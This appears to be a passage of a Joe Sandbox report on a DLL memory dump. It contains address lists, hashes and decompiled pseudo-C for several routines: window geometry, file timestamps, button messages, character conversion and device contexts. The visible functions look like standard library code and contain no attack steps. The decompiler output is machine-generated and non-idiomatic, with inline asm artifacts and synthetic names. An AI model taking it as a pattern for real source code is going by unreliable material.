0x1001989c
0x100198a1
0x100198a3
0x100198a6
0x00000000
0x100198a8
0x100198ab
0x100198b3
0x100198b5
0x100198b5
0x100198b6
0x100198b9
0x100198d4
0x100198e0
0x100198eb
0x100198fa
0x100198fb
0x10019900
0x1001990a
0x1001990a
0x10019912
0x10019917
0x10019921
0x10019923
0x10019925
0x10019986
0x10019995
0x10019997
0x10019999
0x1001999f
0x100199a9
0x100199ac
0x100199b2
0x100199b5
0x100199b8
0x100199ba
0x100199c5
0x100199d1
0x100199d4
0x100199da
0x100199dd
0x100199e0
0x100199e2
0x100199e4
0x100199f2
0x00000000
0x100199f2
0x100199bc
0x100199bc
0x100199bc
0x100199ba
0x10019927
0x10019927
0x1001992b
0x10019936
0x10019939
0x1001993b
0x1001993e
0x10019940
0x10019940
0x10019947
0x1001994a
0x100199f4
0x100199f6
0x100199fb
0x100199fe
0x10019a00
0x10019a10
0x10019a1a
0x10019a23
0x10019a23
0x10019a28
0x10019950
0x10019950
0x10019953
0x10019963
0x1001996d
0x10019976
0x10019976
0x1001997b
0x1001997b
0x1001994a
0x10019a2e
0x10019a2e
0x100198a6
0x1001988e
0x1001988e
0x10004e6e
0x10004e71
0x10004e7b
0x10004e82
0x10004e87
0x10004e88
0x10004e8f
0x10004e9e
0x10004ea0
0x10004ea3
0x10004ea7
0x10004eaa
0x10004eac
0x10004eac
0x10004eb6
0x10004eb6

APIs

IsWindowVisible.USER32(?), ref: 100198AB
GetDesktopWindow.USER32 ref: 100198BB
GetWindowRect.USER32 ref: 100198D4
GetWindowRect.USER32 ref: 100198E0

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: Window$Rect$DesktopVisible
String ID:
API String ID: 1055025324-0
Opcode ID: ef76f55fcefd2cae7d74b9455366248ca8dbe27d5b7ca6cb76258884cb09bc7f
Instruction ID: 8de48d2105652726057613f2335e895d96fc1fae9d5598094c6c5e62d9502a62
Opcode Fuzzy Hash: ef76f55fcefd2cae7d74b9455366248ca8dbe27d5b7ca6cb76258884cb09bc7f
Instruction Fuzzy Hash: F751F975A0010AAFDB04DFA8CD84CAEB7B9FF49344B114468F605EB265DB30EE41CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1001C6EB Relevance: 6.1, APIs: 4, Instructions: 132
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001C6EB(void* __ecx, void* __eflags, signed int* _a4) {
				char _v12;
				struct _FILETIME _v20;
				struct _FILETIME _v28;
				char _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t52;
				long _t56;
				signed int* _t75;
				signed int* _t78;
				signed int* _t81;
				struct _FILETIME* _t88;
				void* _t100;
				CHAR* _t101;
				signed int* _t102;
				void* _t103;
				void* _t107;

				_t85 = __ecx;
				_t102 = _a4;
				_t100 = __ecx;
				E10020F40(__ecx, _t102, 0, 0x128);
				E10004EB7(0, _t85, _t100, _t102, _t103,  &(_t102[8]), 0x104,  *(_t100 + 0xc), 0xffffffff);
				_t52 =  *(_t100 + 4);
				_t107 = _t52 -  *0x100384f0; // 0xffffffff
				if(_t107 == 0) {
					L21:
					return 1;
				}
				_t88 =  &_v12;
				if(GetFileTime(_t52, _t88,  &_v20,  &_v28) != 0) {
					_t56 = GetFileSize( *(_t100 + 4), 0);
					_t102[6] = _t56;
					_t102[7] = 0;
					if(_t56 != 0xffffffff || 0 != 0) {
						_t101 =  *(_t100 + 0xc);
						if( *((intOrPtr*)(_t101 - 0xc)) != 0) {
							_t102[8] = (_t88 & 0xffffff00 | GetFileAttributesA(_t101) == 0xffffffff) - 0x00000001 & _t57;
						} else {
							_t102[8] = 0;
						}
						if(E1001C573( &_v12) == 0) {
							 *_t102 = 0;
							_t102[1] = 0;
						} else {
							_t81 = E1001C68D( &_v36,  &_v12, 0xffffffff);
							 *_t102 =  *_t81;
							_t102[1] = _t81[1];
						}
						if(E1001C573( &_v20) == 0) {
							_t102[4] = 0;
							_t102[5] = 0;
						} else {
							_t78 = E1001C68D( &_v36,  &_v20, 0xffffffff);
							_t102[4] =  *_t78;
							_t102[5] = _t78[1];
						}
						if(E1001C573( &_v28) == 0) {
							_t102[2] = 0;
							_t102[3] = 0;
						} else {
							_t75 = E1001C68D( &_v36,  &_v28, 0xffffffff);
							_t102[2] =  *_t75;
							_t102[3] = _t75[1];
						}
						if(( *_t102 | _t102[1]) == 0) {
							 *_t102 = _t102[2];
							_t102[1] = _t102[3];
						}
						if((_t102[4] | _t102[5]) == 0) {
							_t102[4] = _t102[2];
							_t102[5] = _t102[3];
						}
						goto L21;
					} else {
						goto L2;
					}
				}
				L2:
				return 0;
			}

0x1001c6eb
0x1001c6f3
0x1001c700
0x1001c702
0x1001c715
0x1001c71a
0x1001c720
0x1001c726
0x1001c83a
0x00000000
0x1001c83c
0x1001c734
0x1001c741
0x1001c74e
0x1001c757
0x1001c75a
0x1001c75d
0x1001c763
0x1001c769
0x1001c781
0x1001c76b
0x1001c76b
0x1001c76b
0x1001c78f
0x1001c7ab
0x1001c7ad
0x1001c791
0x1001c79a
0x1001c7a1
0x1001c7a6
0x1001c7a6
0x1001c7bb
0x1001c7dc
0x1001c7df
0x1001c7bd
0x1001c7c6
0x1001c7cd
0x1001c7d3
0x1001c7d3
0x1001c7ed
0x1001c80e
0x1001c811
0x1001c7ef
0x1001c7f8
0x1001c7ff
0x1001c805
0x1001c805
0x1001c819
0x1001c81e
0x1001c823
0x1001c823
0x1001c82c
0x1001c831
0x1001c837
0x1001c837
0x00000000
0x00000000
0x00000000
0x00000000
0x1001c75d
0x1001c743
0x00000000

APIs

_memset.LIBCMT ref: 1001C702

Part of subcall function 10004EB7: _wctomb_s.LIBCMT ref: 10004EC7

GetFileTime.KERNEL32(?,?,?,?), ref: 1001C739
GetFileSize.KERNEL32(?,00000000), ref: 1001C74E

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: File$SizeTime_memset_wctomb_s
String ID:
API String ID: 26245289-0
Opcode ID: 849433f6196f86cb5afcb6a6d1b4fa8c1ab3bc4dc122d4181a5b04c53ba76e7d
Instruction ID: 51a8328b60633bd59e5f15858ada0f86eee49ce44263773015f9aa20d2328a8a
Opcode Fuzzy Hash: 849433f6196f86cb5afcb6a6d1b4fa8c1ab3bc4dc122d4181a5b04c53ba76e7d
Instruction Fuzzy Hash: 0B410C759047099FC724CF68C881C9AB7F8FF087607118A2DE5A6DB691E770F984CB64

Uniqueness

Uniqueness Score: -1.00%

Function 1000F366 Relevance: 6.1, APIs: 4, Instructions: 103
windowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E1000F366(void* __ecx, struct HWND__** _a4) {
				struct HWND__** _v8;
				struct HWND__** _v12;
				long _t31;
				struct HWND__** _t32;
				struct HWND__** _t44;
				struct HWND__** _t45;
				long _t47;
				void* _t49;
				struct HWND__** _t63;

				_push(__ecx);
				_push(__ecx);
				_t49 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x4c)) != 0) {
					_t31 = _a4;
					if(_t31 != 0) {
						if( *((intOrPtr*)(_t31 + 8)) == 0) {
							L4:
							_t32 = E1001B8D6( *((intOrPtr*)(_t49 + 0x4c)) + 0x40, _t31, 0);
							_v12 = _t32;
							_a4 = _t32;
							E1000911A( &_a4);
							while(_a4 != 0) {
								_t37 =  *((intOrPtr*)(E1000911A( &_a4)));
								_v8 =  *((intOrPtr*)(E1000911A( &_a4)));
								if((E1000F07E(_t37) & 0x00020000) != 0) {
									break;
								} else {
									_t45 = _v8;
									if(_t45[2] == 0 || SendMessageA( *_t45, 0xf0, 0, 0) != 1) {
										continue;
									} else {
										L16:
										_t44 = _v8;
										goto L17;
									}
								}
								goto L18;
							}
							_a4 = _v12;
							_t31 = E1000F16D( &_a4);
							while(_a4 != 0) {
								_t63 =  *(E1000F16D( &_a4));
								_v8 = _t63;
								if(_t63[2] == 0) {
									L13:
									_t31 = E1000F07E(_t63);
									if((_t31 & 0x00020000) == 0) {
										continue;
									}
								} else {
									if(SendMessageA( *_t63, 0xf0, 0, 0) == 1) {
										goto L16;
									} else {
										_t63 = _v8;
										goto L13;
									}
								}
								goto L18;
							}
						} else {
							_t47 = SendMessageA( *_t31, 0xf0, 0, 0);
							_t44 = _a4;
							if(_t47 == 1) {
								L17:
								_t31 = SendMessageA( *_t44, 0xf1, 0, 0);
							} else {
								goto L4;
							}
						}
						L18:
					}
				}
				return _t31;
			}

0x1000f369
0x1000f36a
0x1000f36d
0x1000f374
0x1000f37a
0x1000f37f
0x1000f38f
0x1000f3a8
0x1000f3b0
0x1000f3b8
0x1000f3bb
0x1000f3c5
0x1000f406
0x1000f3db
0x1000f3df
0x1000f3ec
0x00000000
0x1000f3ee
0x1000f3ee
0x1000f3f4
0x00000000
0x1000f461
0x1000f461
0x1000f461
0x00000000
0x1000f461
0x1000f3f4
0x00000000
0x1000f3ec
0x1000f411
0x1000f41b
0x1000f45a
0x1000f431
0x1000f436
0x1000f439
0x1000f44e
0x1000f44e
0x1000f458
0x00000000
0x00000000
0x1000f43b
0x1000f449
0x00000000
0x1000f44b
0x1000f44b
0x00000000
0x1000f44b
0x1000f449
0x00000000
0x1000f439
0x1000f391
0x1000f39a
0x1000f39f
0x1000f3a2
0x1000f464
0x1000f46d
0x00000000
0x00000000
0x00000000
0x1000f3a2
0x1000f46f
0x1000f46f
0x1000f37f
0x1000f473

APIs

SendMessageA.USER32 ref: 1000F39A
SendMessageA.USER32 ref: 1000F3FF
SendMessageA.USER32 ref: 1000F444
SendMessageA.USER32 ref: 1000F46D

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 6d35c6499f517dbc8d4cda50e386da3e84cd8cfccc05535bafaf18b93e278df5
Instruction ID: f3d15569573835c18d81f199704cf95a6a2abc57fcee4060fc3bf4c3a8b62e7d
Opcode Fuzzy Hash: 6d35c6499f517dbc8d4cda50e386da3e84cd8cfccc05535bafaf18b93e278df5
Instruction Fuzzy Hash: A9317E30501219FFEB15DF51C881EAF3BA9EF417D0F10806AF9059B619DA70AD80EB91

Uniqueness

Uniqueness Score: -1.00%

Function 1002DB82 Relevance: 6.1, APIs: 4, Instructions: 101
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E1002DB82(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				intOrPtr _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t72;

				_t72 = _a8;
				if(_t72 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t72 != 0) {
						E1002276D( &_v20, __edi, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E1002D2BC( *_t72 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								_t40 = _v20 + 4; // 0x840ffff8
								__eflags = MultiByteToWideChar( *_t40, 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E10020B71(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t15 = _t56 + 0xac; // 0xa045ff98
							_t65 =  *_t15;
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								_t24 = _t56 + 0xac; // 0xa045ff98
								__eflags = _a12 -  *_t24;
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t72[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								__eflags = _v8;
								_t27 = _t56 + 0xac; // 0xa045ff98
								_t57 =  *_t27;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t21 = _t56 + 4; // 0x840ffff8
							_t58 = MultiByteToWideChar( *_t21, 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t72 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

0x1002db8a
0x1002db91
0x1002dba6
0x00000000
0x1002db98
0x1002db9a
0x1002dbb2
0x1002dbb7
0x1002dbba
0x1002dbbd
0x1002dbe6
0x1002dbeb
0x1002dbef
0x1002dc70
0x1002dc82
0x1002dc8b
0x1002dc8d
0x1002dbcd
0x1002dbcd
0x1002dbd0
0x1002dbd2
0x1002dbd5
0x1002dbd5
0x1002dbd5
0x1002dbd5
0x00000000
0x1002dbdb
0x1002dc4f
0x1002dc4f
0x1002dc54
0x1002dc5a
0x1002dc5d
0x1002dc5f
0x1002dc62
0x1002dc62
0x1002dc62
0x1002dc62
0x00000000
0x1002dc66
0x1002dbf1
0x1002dbf4
0x1002dbf4
0x1002dbfa
0x1002dbfd
0x1002dc24
0x1002dc27
0x1002dc27
0x1002dc2d
0x00000000
0x00000000
0x1002dc2f
0x1002dc32
0x00000000
0x00000000
0x1002dc34
0x1002dc34
0x1002dc37
0x1002dc37
0x1002dc3d
0x1002dbab
0x1002dbab
0x1002dc46
0x00000000
0x1002dc46
0x1002dbff
0x1002dc02
0x00000000
0x00000000
0x1002dc06
0x1002dc14
0x1002dc17
0x1002dc1d
0x1002dc1f
0x1002dc22
0x00000000
0x00000000
0x00000000
0x1002dc22
0x1002dbbf
0x1002dbc2
0x1002dbc4
0x1002dbca
0x1002dbca
0x00000000
0x1002db9c
0x1002db9c
0x1002dba1
0x1002dba3
0x1002dba3
0x00000000
0x1002dba1
0x1002db9a

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1002DBB2
__isleadbyte_l.LIBCMT ref: 1002DBE6
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,00000001,?,00000001,1002D65D,?,?,00000002), ref: 1002DC17
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,00000001,?,00000001,1002D65D,?,?,00000002), ref: 1002DC85

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 3e2ec8070e78dc2584ef5f67e7d258c507cb05aa85bef0efbd0a2838ee37334f
Instruction ID: 37aa916cde1404fb766b6052f6d7e43a4bf17a9cf34586f159c1b1eafb0ae636
Opcode Fuzzy Hash: 3e2ec8070e78dc2584ef5f67e7d258c507cb05aa85bef0efbd0a2838ee37334f
Instruction Fuzzy Hash: 9131F231A0028AEFDB12EF64DC90AAE7BE5FF00351FA285AAE4608B191D370DD40DB50

Uniqueness

Uniqueness Score: -1.00%

Function 10016C75 Relevance: 6.1, APIs: 4, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E10016C75(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t51;
				void* _t53;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t70;
				intOrPtr* _t77;
				signed int _t80;
				void* _t82;
				void* _t83;
				intOrPtr* _t84;

				_t83 = __eflags;
				_push(0x20);
				E1001FBC4(E10034195, __ebx, __edi, __esi);
				_t80 = 0;
				 *((intOrPtr*)(_t82 - 0x10)) = 0;
				 *((intOrPtr*)(_t82 - 0x14)) = 0x10038988;
				_t68 =  *((intOrPtr*)(_t82 + 8));
				_t71 = _t82 - 0x1c;
				 *(_t82 - 4) = 0;
				E1000EC55(_t82 - 0x1c, _t83,  *((intOrPtr*)(_t68 - 0xb0)));
				_t77 =  *((intOrPtr*)(_t82 + 0x14));
				_t84 = _t77;
				 *(_t82 - 4) = 1;
				_t85 = _t84 == 0;
				if(_t84 == 0) {
					E10004E6E(_t68, _t71, _t77, 0, _t85);
				}
				 *_t77 = _t80;
				if( *((intOrPtr*)(_t68 - 8)) == _t80) {
					_push(GetDC( *( *((intOrPtr*)( *((intOrPtr*)(_t68 - 0xac)) + 0x20)) + 0x20)));
					_t51 = E1000FFD3(_t68, _t71, _t77, _t80, __eflags);
					__eflags = _t51 - _t80;
					 *((intOrPtr*)(_t68 - 8)) = _t51;
					if(_t51 == _t80) {
						goto L3;
					} else {
						__eflags =  *(_t82 + 0xc) - _t80;
						if( *(_t82 + 0xc) != _t80) {
							IntersectRect(_t82 - 0x2c, _t68 - 0x9c,  *(_t82 + 0xc));
						} else {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t77 =  *((intOrPtr*)(_t82 + 0x14));
							_t80 = 0;
						}
						E10010292(_t82 - 0x14, _t77, _t82, CreateRectRgnIndirect(_t82 - 0x2c));
						E1000FD9F( *((intOrPtr*)(_t68 - 8)), _t82 - 0x14, 1);
						_t69 =  *((intOrPtr*)(_t68 - 8));
						__eflags = _t69 - _t80;
						if(_t69 != _t80) {
							_t70 =  *((intOrPtr*)(_t69 + 4));
						} else {
							_t70 = 0;
						}
						__eflags =  *((intOrPtr*)(_t82 - 0x18)) - _t80;
						 *_t77 = _t70;
						 *(_t82 - 4) = 0;
						if( *((intOrPtr*)(_t82 - 0x18)) != _t80) {
							_push( *((intOrPtr*)(_t82 - 0x1c)));
							_push(_t80);
							E1000E519();
						}
						 *(_t82 - 4) =  *(_t82 - 4) | 0xffffffff;
						 *((intOrPtr*)(_t82 - 0x14)) = 0x10038068;
						E100102E5(_t82 - 0x14);
						_t53 = 0;
						__eflags = 0;
					}
				} else {
					L3:
					 *(_t82 - 4) = 0;
					if( *((intOrPtr*)(_t82 - 0x18)) != _t80) {
						_push( *((intOrPtr*)(_t82 - 0x1c)));
						_push(_t80);
						E1000E519();
					}
					 *(_t82 - 4) =  *(_t82 - 4) | 0xffffffff;
					 *((intOrPtr*)(_t82 - 0x14)) = 0x10038068;
					E100102E5(_t82 - 0x14);
					_t53 = 0x80004005;
				}
				return E1001FC9C(_t53);
			}

0x10016c75
0x10016c75
0x10016c7c
0x10016c81
0x10016c83
0x10016c86
0x10016c8d
0x10016c96
0x10016c99
0x10016c9c
0x10016ca1
0x10016ca6
0x10016cab
0x10016caf
0x10016cb1
0x10016cb3
0x10016cb3
0x10016cb8
0x10016cbd
0x10016d00
0x10016d01
0x10016d06
0x10016d08
0x10016d0b
0x00000000
0x10016d0d
0x10016d0d
0x10016d10
0x10016d34
0x10016d12
0x10016d1b
0x10016d1c
0x10016d1d
0x10016d1e
0x10016d1f
0x10016d22
0x10016d22
0x10016d48
0x10016d56
0x10016d5b
0x10016d5e
0x10016d60
0x10016d66
0x10016d62
0x10016d62
0x10016d62
0x10016d69
0x10016d6c
0x10016d6e
0x10016d72
0x10016d74
0x10016d77
0x10016d78
0x10016d78
0x10016d7d
0x10016d84
0x10016d8b
0x10016d90
0x10016d90
0x10016d90
0x10016cbf
0x10016cbf
0x10016cc2
0x10016cc6
0x10016cc8
0x10016ccb
0x10016ccc
0x10016ccc
0x10016cd1
0x10016cd8
0x10016cdf
0x10016ce4
0x10016ce4
0x10016d97

APIs

__EH_prolog3.LIBCMT ref: 10016C7C

Part of subcall function 10004E6E: __CxxThrowException@8.LIBCMT ref: 10004E82
Part of subcall function 10004E6E: __EH_prolog3.LIBCMT ref: 10004E8F

GetDC.USER32(?), ref: 10016CFA
IntersectRect.USER32 ref: 10016D34
CreateRectRgnIndirect.GDI32(?), ref: 10016D3E

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: H_prolog3Rect$CreateException@8IndirectIntersectThrow
String ID:
API String ID: 2872313494-0
Opcode ID: 66e4162995eff29e74f150a019b0503a6bfab80782a46ba9d83f80b8aff9d0d3
Instruction ID: aba366ee442878ba1e0e253a8bcb53805126a2189cb4a44b534bc72d57d8081b
Opcode Fuzzy Hash: 66e4162995eff29e74f150a019b0503a6bfab80782a46ba9d83f80b8aff9d0d3
Instruction Fuzzy Hash: 45316A75D0026ADFDF02CFA4CD85AAEBBB5FF08340F118096E541AF141D775AA81CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 10011620 Relevance: 6.1, APIs: 4, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E10011620(void* __ecx, void* __edx, void* __edi, void* __eflags, signed int _a4) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t36;
				intOrPtr _t37;
				signed int _t39;
				void* _t47;
				intOrPtr* _t48;
				void* _t50;
				void* _t51;
				void* _t64;
				void* _t65;
				intOrPtr _t66;
				void* _t68;
				void* _t70;

				_t65 = __edi;
				_t64 = __edx;
				_t51 = E1000EC3C(_t50, __ecx, __edi, _t68, __eflags);
				_t29 =  *((intOrPtr*)(_t51 + 0x10));
				if(_t29 == 0) {
					L19:
					return 0 |  *((intOrPtr*)(_t51 + 0x10)) != 0x00000000;
				}
				_t32 = _t29 - 1;
				 *((intOrPtr*)(_t51 + 0x10)) = _t32;
				if(_t32 != 0) {
					goto L19;
				}
				if(_a4 == 0) {
					L8:
					_push(_t65);
					_t66 =  *((intOrPtr*)(E1000EC09(_t51, _t65, 0, _t77) + 4));
					_t70 = E1001063D(0x10048490);
					if(_t70 == 0 || _t66 == 0) {
						L18:
						goto L19;
					} else {
						_t35 =  *((intOrPtr*)(_t70 + 0xc));
						_t80 = _t35;
						if(_t35 == 0) {
							L12:
							if( *((intOrPtr*)(_t66 + 0x98)) != 0) {
								_t36 =  *((intOrPtr*)(_t70 + 0xc));
								_a4 = _a4 & 0x00000000;
								_t83 = _t36;
								if(_t36 != 0) {
									_push(_t36);
									_t39 = E10022FC3(_t51, _t64, _t66, _t70, _t83);
									_push( *((intOrPtr*)(_t70 + 0xc)));
									_a4 = _t39;
									E1001F6F4(_t51, _t66, _t70, _t83);
								}
								_t37 = E1001F631(_t51, _t64, _t66, _t70,  *((intOrPtr*)(_t66 + 0x98)));
								 *((intOrPtr*)(_t70 + 0xc)) = _t37;
								if(_t37 == 0 && _a4 != _t37) {
									 *((intOrPtr*)(_t70 + 0xc)) = E1001F631(_t51, _t64, _t66, _t70, _a4);
								}
							}
							goto L18;
						}
						_push(_t35);
						if(E10022FC3(_t51, _t64, _t66, _t70, _t80) >=  *((intOrPtr*)(_t66 + 0x98))) {
							goto L18;
						}
						goto L12;
					}
				}
				if(_a4 != 0xffffffff) {
					_t47 = E100069D9();
					if(_t47 != 0) {
						_t48 =  *((intOrPtr*)(_t47 + 0x3c));
						_t77 = _t48;
						if(_t48 != 0) {
							 *_t48(0, 0);
						}
					}
				}
				E10011554( *((intOrPtr*)(_t51 + 0x20)), _t65);
				E10011554( *((intOrPtr*)(_t51 + 0x1c)), _t65);
				E10011554( *((intOrPtr*)(_t51 + 0x18)), _t65);
				E10011554( *((intOrPtr*)(_t51 + 0x14)), _t65);
				E10011554( *((intOrPtr*)(_t51 + 0x24)), _t65);
				goto L8;
			}

0x10011620
0x10011620
0x1001162a
0x1001162c
0x10011633
0x1001170b
0x10011716
0x10011716
0x10011639
0x1001163c
0x1001163f
0x00000000
0x00000000
0x10011648
0x1001168c
0x1001168c
0x10011692
0x1001169f
0x100116a3
0x1001170a
0x00000000
0x100116a9
0x100116a9
0x100116ac
0x100116ae
0x100116bf
0x100116c6
0x100116c8
0x100116cb
0x100116cf
0x100116d1
0x100116d3
0x100116d4
0x100116d9
0x100116dc
0x100116df
0x100116e5
0x100116ec
0x100116f4
0x100116f7
0x10011707
0x10011707
0x100116f7
0x00000000
0x100116c6
0x100116b0
0x100116bd
0x00000000
0x00000000
0x00000000
0x100116bd
0x100116a3
0x1001164e
0x10011650
